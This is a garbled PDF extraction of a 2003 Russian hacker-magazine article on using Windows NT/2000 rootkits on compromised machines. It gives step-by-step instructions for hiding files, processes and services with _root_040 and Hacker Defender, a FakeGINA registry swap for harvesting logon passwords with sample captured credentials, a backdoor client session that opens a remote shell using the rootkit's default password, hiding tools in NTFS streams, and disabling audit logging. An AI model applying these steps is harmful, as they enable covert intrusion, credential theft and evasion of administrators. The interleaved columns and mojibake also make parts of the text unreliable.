
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мальны (даже в w2k). Средства удаленного адми-

буй посканить хост nmap'ом, получишь очень

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нистрирования (вроде pcAnywhere, BO200 etc.)

интересные результаты :)):

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

очень легко засечь, кроме того, требуется их как-

# ifconfig eth0 10.10.10.1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нибудь запустить. Обычно добавляют нужные

# telnet 10.0.0.166

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

строки в какой-нибудь win.ini и перезапускают

Connected to 10.0.0.166.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

машину (что очень опасно), но подобная схема не

Escape character is '^]'.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

относится к VNC (и еще некоторой радостью яв-

_

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ляется появление Terminal Services). Идем даль-

доступные команды:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ше, забудем на некоторое время о gui и перей-

ps # показать список процессов

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дем к командной строке. Как с ней быть? Можно

8

System

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

поставить ее на netcat (no comments), а можно

136

SMSS.EXE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

запускать через Web-сервер (если на взломанной

164

CSRSS.EXE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

машине он есть, посредством, например,

184

WINLOGON.EXE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

cmdasp.asp). Но опять выходит глупость - неуже-

212

SERVICES.EXE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ли админ не заметит новый скрипт (да еще с та-

232

LSASS.EXE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ким названием, хотя можно и переименовать)

hidedir # спрятать файл/каталог (on/off)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

или новый открытый порт в системе (со стран-

hideproc # спрятать процесс (on/off)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ным приглашением Enter Password: или просто

debugint # резко перезагрузить машину

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C:\>)? Скрытие папок и файлов. Насчет первого,

(удаленную, естественно :))

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

как обычно, отстой (я опускаю использование

sniffkeys

# keylogger (в данной версии

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

attrib +h :) как для каталогов, так и для файлов).

отсутствует)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Насчет второго есть отличное решение - потоки

Доступа к командной строке пока нет (данную

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

NTFS, например: cp dsniff.exe C:\WINNT\SYS-

функцию планируется добавить в версии 0.44).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

TEM32\kernel32.dll:dsniff.exe. Теперь можно с ра-

Как ты уже понял, теперь все папки/файлы/про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

достью удалить исходный файл (del dsniff.exe) и

цессы и ключи реестра, которые начинаются с

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

радоваться жизни (а восстановить так: cp

_root_, будут скрыты, например:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C:\WINNT\SYSTEM32\kernel32.dll:dsniff.exe

C:\>mkdir _root_YourDir

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

dsniff.exe). Может быть, кто-то возразит и ска-

C:\>cd _root_YourDir

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

жет, что средства контроля целостности файлов

C:\>copy

c:\winnt\system32\cmd.exe

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сразу заметят изменение размера kernel32.dll. А

_root_cmd.exe

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вот и нет! Размер файла не изменяется, изменя-

Можешь запускать _root_cmd.exe и ни в каких

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ется свободное место на диске :). Логи - тут то-

списках процессов он светиться не будет (так-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

же надо радоваться. Предоставляемые данные

же не будет виден каталог _root_YourDir). Вот,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

минимальны, так что админы их обычно сопос-

в принципе, и все. Если вдруг тебе понадобит-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тавляют с журналами системы обнаружения атак

ся запустить/остановить руткит, то набирай

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

и фаерволами, только так можно добиться хоть

net start

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

каких-нибудь результатов. Но на всякий случай

_root_ и net stop _root_ соответственно.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

во время твоих действий советую набрать audit-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

pol /disable (а при окончании auditpol /enable). Но

GINA TROJAN

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

стоит ли из-за всего этого считать NT/2k безо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пасной? Конечно, нет! Подпишись на security-

FakeGINA - это сборщик паролей для Nt/2k.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рассылки и составь баланс unix- (даже всех дис-

"Что тут особенного?" - скажешь ты. "Есть ведь

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

трибутивов) и win-багов. Получится соотношение

всякие keylogger'ы и прочее". А то, что про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

примерно 1 к 3. Это особенно касается IE, OE и

грамму можно установить удаленно (regini&ftp),

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IIS. К чему это я? Безопасность NT в ее тупости.

и антивирусы, естественно, ее не засекают (так

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хотя система изначально создавалась для сети,

как, по сути, это не вирус/троян, а поддельная

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ее возможности не на высоте. К чему мы при-

библиотека). Прога осуществляет перехват об-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

шли? Так или иначе, остается несколько белых

ращений WinLogon к msgina.dll (то есть часть

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пятен - скрытие каталогов, получения незаметно-

процедуры обычного входа в систему), захва-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

го удаленного доступа (через gui или cmd) и т.д.

тывая при этом имя пользователя и пароль.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

И тут на помощь тебе приходят руткиты, к описа-

Для ее использования тебе надо скопировать

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нию которых мы и перейдем!

 

 

fakegina.dll в папку

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

c:\winnt\sysyem32\, потом отправляйся в ре-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

_ROOT_040 - КЛАССИКА, НО ОЧЕНЬ

åñòð

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ПОУЧИТЕЛЬНАЯ...

 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Это первый руткит для nt/2k. Доступна альфа-

indows NT\CurrentVersion\Winlogon] è

замени

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

значение GinaDLL с msgina.dll на fakegina.dll

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

версия (хотя она была выпущена примерно

(если ты не сможешь найти этот параметр, то

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

год назад). Из достоинств хотелось бы отме-

просто создай его). Теперь после перезагрузки

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тить возможность прятать процессы, ключи

и повторного входа в систему можно будет по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

реестра, файлы и каталоги (если они начина-

смотреть награбленные пароли:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ются с _root_). Итак, чтобы запустить руткит

C:\>more c:\winnt\system32\passlist.txt

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тебе следует скопировать _root_.sys и

TEST\Administrator 1!ImGod!1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

deploy.exe в какую-нибудь директорию (на-

TEST\stalsen qwerTTY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пример,

YourDir)

è

набрать

Как ты уже понял, TEST - имя компьюте-

 

 

 

 

 

 

 

 

 

 

 

 

 

5 Юниксоид 6 X-Стиль

7 Кодинг

8

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

D

 

 

<Page 066>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Взлом

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ЧТО ТАКОЕ WIN R00TKITS И ЧТО С НИМИ ДЕЛАТЬ

Stalsen (stalsen@real.xakep.ru)

http://trinux.atanor.ru (thanks to qpyHT)

ХАКЕР\¹49\Январь\2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ра, Administrator и stalsen - имена пользователей, а 1!ImGod!1 и qwerTTY - пароли. Вообще, имя библиотеки можно переименовать, например, в ginams.dll.

HACKER DEFENDER (BY HOLY_FATHER)

На мой взгляд, это самый лучший из всех доступных руткитов для Windows NT/2k/XP. Большая часть кода написана на Дельфи 6 (и ассемблере). Основная идея состоит в следующем: использовать некоторые API функции (WriteProcessMemory и CreateRemoteThread), чтобы создать новую "нить" но всех запущенных процессах системы, которая будет пытаться переписать некоторые функции kernel32.dll (вроде Kernel32.ReadFile, Kernel32.CreateProcessW, etc) и вставлять поддельный (то есть нужный) код, назначение которого - проверять результаты выполнения некоторых API и модифицировать их "по своему усмотрению". Это позволяет программе прятать файлы, процессы, сервисы и ключи реестра. Более подробное описание работы читай в файле readme на английском и чешском языках. Ну что ж, перейдем к использованию. У руткита есть конфиг-файл hxdef051.ini. Существует 6 частей настройки, а конкретно это [Hidden Table] - список файлов и папок которые должны быть спрятаны. Например, в корне диска ты создал директорию mystuff со всякими прогами типа fscan, dsniff, fgrind, и тебе не хочется их показывать, тогда пиши в конфиг:

[Hidden Table]

~ъ@¾.exe # читай ниже mystuff*

fscan.exe

fgring.exe

dsniff.exe

hxdef* # сам руткит тоже надо скрыть!

Далее [Root Processes] - программы, которые будут свободны от инфекции (то есть смогут получать реальные результаты выполнения API), например:

[Root Processes]

~ъ@¾.exe # читай ниже

fscan.exe

fgring.exe

dsniff.exe

hxdef*

Теперь проги fscan, fgrind, dsniff и сам руткит смогут получать верные данные (т.е. видеть скрытые файлы, каталоги и т.д.). Возможно, тебе еще понадобится скрывать всякие сервисы (например, VNC), тогда пиши:

[Hidden Services] WinVNC*

HackerDefender* # это дефолтное имя "руткитсервиса".

Хотя для установки VNC надо еще добавить некоторые ключи реестра, которые тоже желательно скрыть:

[Hidden RegKeys] WinVNC*

HackerDefender051 # регключ руткита LEGACY_HACKERDEFENDER051 # регключ руткита А если тебе надо что-нибудь запустить во время старта системы, то используй [Startup Run]: [Startup Run]

C:\mystuff\troyan.exe

[Password] - используется бэкдором. Вот о нем и поговорим. Для корректной работы он перехватывает некоторые API функции, связанные с получением пакетов из сети, и если поступающие данные равняются 256-битному ключу, то в каталоге temp создается копия шелла с именем "~ ъ@¾.exe", который, естественно, будет скрыт, но к счастью все это происходит после проверки пароля (чего нельзя сказать о _root_040):

[Password] hxdef-rulez

Это дефолтный пароль, запомни его, может быть, пригодится :). Как видишь, обычным телнетом сюда не войдешь, нужен специальный клиент. Но о нем позже. Запускаем руткит (хорошо еще, что все делается через командную строку, а то представляю себе небольшое окошко с крутой кнопкой InFec7eD :), тогда бы уже пошли мучения для удаленного пользователя): C:\mystuff>hxdef051.exe. Все, теперь указанные папки/файлы/сервисы и ключи реестра скрыты, пора проверить бэкдор. Я запустил стандартную версию службы telnet на взломанной машине. Теперь берем клиент и коннектимся:

C:\>bdcli051.exe (или так: C:\>bdcli051.exe 169.254.173.210 23 hxdef-rulez, то есть формата host port password)

Host: 169.254.173.210 Port: 23

Pass: hxdef-rulez connecting server...

receiving banner...

opening backdoor...

backdoor found checking backdoor .....

backdoor ready

authorization sent, waiting for reply authorization - SUCCESSFUL backdoor activated!

close shell and all progz to end session Microsoft Windows 2000 [Версия 5.00.2195]

<C> Корпорация Майкрософт, 1985-2000. C:\WINNT\system32> _

Мда, до боли знакомая строчка :). Теперь ты можешь делать все что угодно... Во-первых, команды будут получать реальные данные (помнишь [Root Processed]?). Во-вторых, ты можешь перезапускать руткит в соответствии с новыми данными конфига: C:\>hxdef051.exe -:refresh. Что еще можно сделать? Многое! Ведь ты теперь получил интерактивный доступ к шеллу. Теперь ты можешь через ftp накачать уйму программ (eq дополнительные утилиты командной строки, сканеры всякие, если хочешь графического управления, то скачай VNC). Только потом не забудь перезапустить руткит, предварительно добавив имена прог в [Hidden Tables] и [Root Processes] (вспомни команду echo в шелле). Как закончишь, смело выходи командой exit :). А теперь попробуем ввести левый пароль:

C:\>bdcli051.exe 169.254.173.210 23 PaSSwoRd

connecting server...

receiving banner...

opening backdoor...

backdoor found checking backdoor .....

backdoor ready

authorization sent, waiting for reply authorization - FAILED!

Bad password!

И если бэкдора нет, то увидишь что-то вроде: backdoor is not installed on 169.254.173.210:1025. Некоторое дополнение по поводу бэкдора: он будет работать при условии, что на определенном сервисе входящий буфер будет больше или равен 256 битам. Как мы уже выяснили, это Telnet,

àтакже Apache (for Win32), IIS, Oracle, etc. Кроме того, Web-сервер не будет логировать команды,

àFTP- è SMTP-сервисы только записывают дисконнект в лог-файл. Но от себя хочу заметить, что через netstat атакующий очень легко вычисляется, и еще - если журнал безопасности логирует успешные входы (такое редко бывает из-за "засорения" логов), то можно увидеть записи входа System со странным процессом "Temp\~ ъ@¾.exe". Думаю, эти баги будет устранены в следующей версии. Естественно, радует еще то, что программа фриверная (в принципе, это вполне естественно, не хватало еще платных руткитов), но исходники, увы, пока закрыты. Хотя весь проект планирует перейти на open source с версии 1.0. Существуют еще много не менее интересных средств вроде: NullSys, Hook4Windows, Pepper, Rootkit_IDA, NTKap, NTRooT. Но большая часть из них находится в активной разработке и, естественно, пока не рекомендуется

 

 

 

1

 

2

 

3

 

4

 

66

 

Ньюсы

Феррум

Inside

PC_Zone

Взлом

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

F

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

P

D

 

 

 

 

 

 

 

 

 

o

 

 

 

 

NOW!

r

 

 

 

 

 

 

 

NOW!

 

r

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

 

 

 

w Click

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

p

df

 

 

 

 

 

e

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

РУСКАЯ ОС ДЛЯ ХАКЕРОВ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Как я и обещал очень давно :), проект

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Trinux.Russian.Community наконец-то открыт! Во-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

обще сайт был готов 10 августа, просто с доме-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ном .ru ничего не вышло, так что наш (теперь

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

уже постоянный) адрес - trinux.atanor.ru (спаси-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бо фирме Атанор и лично А.Н.Колядову за любез-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

но предоставленный хостинг). Сайт будет перио-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дически наполняться информацией на русском

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

языке по ОС Тринукс, digital security, также от-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

крыт тематический форум. Не хочу преувеличи-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вать, но, по-моему, это лучшее место в Рунете,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

где можно задать вопрос о Тринуксе. И совсем

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

недавно (во всяком случае, в момент написания

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

этих строк) появился аналог Trinux - RTK: Russian

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Trinux Kit. Это русская операционная система

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

для хакеров, офицеров безопасности и сетевых

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

администраторов. Увы, но пока только альфа-вер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сия. Подробнее обо всем этом смотрите на сайте.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

P.S. Сейчас проекту очень нужны квалифициро-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ванные переводчики, юниксоиды,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

кодеры, да и просто энтузиасты. От вас зависит

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

создание первой русской операционной системы

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

для хакеров. Если вас это хоть немного заинтере-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

совало,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

то смело присылайте свое резюме по адресу trin-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ux@trinux.atanor.ru.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

их использовать на взломанных машинах, так

получение паролей, список посещаемых сай-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

как это может привести к непредсказуемым

тов и т.д.). Естественно, в реале все склады-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

результатам (от аварийной перезагрузки до

вается несколько иначе, обычно отделывают-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

полного краха системы, что с большой вероят-

ся предупреждением (если совсем малолетки)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ностью и произойдет).

или штрафом. Для тех же, кто постарше, ситу-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ация непредсказуема. Небольшое, но, на мой

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

FUCKING LAW

взгляд, важное дополнение - помни, что если

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Естественно, не стоит даже упоминать, что

провайдер государственный, то при жалобах

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

он ОБЯЗАН обратиться в правоохранительные

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

использование руткитов незаконно. Проблема

органы. Если же частник, то вполне реальны

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

заключается в другом – в опасности написа-

разборки иными путями (предупреждение,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ния подобных программ. Давай вспомним

добровольное возмещение "награбленного"

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

арест автора TorNKit. В нашем идиотском УК

или все вышеуказанное с кулаками)... Эх, что-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

РФ это 273 статья - "Создание и распростра-

то я уж слишком разошелся по этой теме...

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нение вредоносных программ для ЭВМ" - до 3

Мой тебе совет: не отравляй жизнь бедным

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лет со штрафом от 200 до 500 минимальных

юзерам, воруя у них инет, т.к. если сравнить

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

окладов. А если еще с тяжкими последствия-

его стоимость и возможные последствия - де-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ми (например, ты по неосторожности запорол

ло того не стоит! А насчет написания рутки-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

руткитом всю систему, ведь на данном этапе

тов/вирусов - я не слышал ни об одном случае

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

эволюции nt/2k rootkits это вполне реально),

преследования их авторов в России.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

и, естественно, компания (якобы или реально)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

понесла убытки и еще вправе потребовать

 

ВЫВОДЫ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

компенсацию ущерба. А вообще наш УК в пла-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

не сетевого терроризма (как это модно сейчас

Теперь уже руткиты докатились и до windows-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

говорить) очень туп. Посуди сам, новый (и не

систем. Это, естественно, радует! До совер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

очень богатый) юзер интернета вдруг натыка-

шенства им еще очень далеко, но, тем не ме-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ется на статью сайта superhackers.narod.ru о

нее, достойные претенденты уже набираются.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

троянах, естественно, скачивает несколько

Конечно, нельзя пока этот "рынок" назвать на-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

версий и посылает кому только можно... Че-

сыщенным (как, например, в unix-совмести-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рез некоторое время по жалобам пользовате-

мых системах), но дело постепенно движет-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лей (из-за этого все обычно и происходит)

ся... А последнюю информацию о руткитах для

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

юзера вычисляет наше неподкупное Управле-

NT/2k можно получить по адресу rootkit.com

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ние Р. "Официально", так сказать (то есть по

(надо заметить, что сервак частенько в дауне).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

